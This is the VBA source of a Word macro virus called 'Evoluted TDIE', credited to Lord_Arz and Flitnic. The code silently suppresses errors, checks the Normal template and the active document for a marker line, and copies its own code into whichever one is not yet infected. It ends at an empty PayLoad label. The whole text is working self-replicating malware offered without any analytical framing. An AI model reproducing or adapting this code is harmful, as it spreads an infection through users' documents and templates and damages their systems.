'Evoluted TDIE by Lord_Arz	TDIE by Flitnic and Lord_Arz (c)
On Error Resume Next
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "REM BEGINN EVOLUTED TDIE" Then NormInstalled = True
If UCase(AI) = "REM BEGINN EVOLUTED TDIE" Then ActInstalled = True

If NormInstalled = True And ActInstalled = True Then GoTo PayLoad

If NormInstalled = False Then
    Set Infection = NormCarrier
    Set Carrier = ActCarrier
Else
    Set Infection = ActCarrier
    Set Carrier = NormCarrier
End If

With Carrier
    VirCode = .Lines(1, .CountOfLines)
End With
With Infection
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, VirCode
End With
PayLoad: